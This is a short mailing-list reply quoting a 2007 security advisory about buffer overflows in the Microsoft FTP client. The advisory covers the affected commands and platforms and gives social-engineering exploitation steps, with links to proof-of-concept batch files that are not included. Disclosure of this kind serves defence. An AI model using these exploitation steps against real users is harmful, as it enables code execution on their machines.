Server down, i can't see the PoC files :-( -mark
On 28/11/2007, Rajesh Sethumadhavan <[EMAIL PROTECTED]> wrote: > > Microsoft FTP Client Multiple Bufferoverflow > Vulnerability > > ##################################################################### > > XDisclose Advisory : XD100096 > Vulnerability Discovered: November 20th 2007 > Advisory Reported : November 28th 2007 > Credit : Rajesh Sethumadhavan > > Class : Buffer Overflow > Denial Of Service > Solution Status : Unpatched > Vendor : Microsoft Corporation > Affected applications : Microsoft FTP Client > Affected Platform : Windows 2000 server > Windows 2000 Professional > Windows XP > (Other Versions may be also effected) > > ##################################################################### > > > Overview: > Bufferoverflow vulnerability is discovered in > microsoft ftp client. Attackers can crash the ftp > client of the victim user by tricking the user. > > > Description: > A remote attacker can craft packet with payload in the > "mget", "ls", "dir", "username" and "password" > commands as demonstrated below. When victim execute > POC or specially crafted packets, ftp client will > crash possible arbitrary code execution in contest of > logged in user. This vulnerability is hard to exploit > since it requires social engineering and shellcode has > to be injected as argument in vulnerable commands. > > The vulnerability is caused due to an error in the > Windows FTP client in validating commands like "mget", > "dir", "user", password and "ls" > > Exploitation method: > > Method 1: > -Send POC with payload to user. > -Social engineer victim to open it. > > Method 2: > -Attacker creates a directory with long folder or > filename in his FTP server (should be other than IIS > server) > -Persuade victim to run the command "mget", "ls" or > "dir" on specially crafted folder using microsoft ftp > client > -FTP client will crash and payload will get executed > > > Proof Of Concept: > http://www.xdisclose.com/poc/mget.bat.txt > http://www.xdisclose.com/poc/username.bat.txt > http://www.xdisclose.com/poc/directory.bat.txt > http://www.xdisclose.com/poc/list.bat.txt > > Note: Modify POC to connect to lab FTP Server > (As of now it will connect to > ftp://xdisclose.com) > > Demonstration: > Note: Demonstration leads to crashing of Microsoft FTP > Client > > Download POC rename to .bat file and execute anyone of > the batch file > http://www.xdisclose.com/poc/mget.bat.txt > http://www.xdisclose.com/poc/username.bat.txt > http://www.xdisclose.com/poc/directory.bat.txt > http://www.xdisclose.com/poc/list.bat.txt > > > Solution: > No Solution > > Screenshot: > http://www.xdisclose.com/images/msftpbof.jpg > > > Impact: > Successful exploitation may allows execution of > arbitrary code with privilege of currently logged in > user. > > Impact of the vulnerability is system level. > > > Original Advisory: > http://www.xdisclose.com/advisory/XD100096.html > > Credits: > Rajesh Sethumadhavan has been credited with the > discovery of this vulnerability > > > Disclaimer: > This entire document is strictly for educational, > testing and demonstrating purpose only. Modification > use and/or publishing this information is entirely on > your own risk. The exploit code/Proof Of Concept is to > be used on test environment only. I am not liable for > any direct or indirect damages caused as a result of > using the information or demonstrations provided in > any part of this advisory. > > > > > > ____________________________________________________________________________________ > Be a better sports nut! Let your teams follow you > with Yahoo Mobile. Try it now. > http://mobile.yahoo.com/sports;_ylt=At9_qDKvtAbMuh1G1SQtBI7ntAcJ > _______________________________________________ > darklab mailing list > [email protected] > http://lists.darklab.org/cgi-bin/mailman/listinfo/darklab >
_______________________________________________ darklab mailing list [email protected] http://lists.darklab.org/cgi-bin/mailman/listinfo/darklab
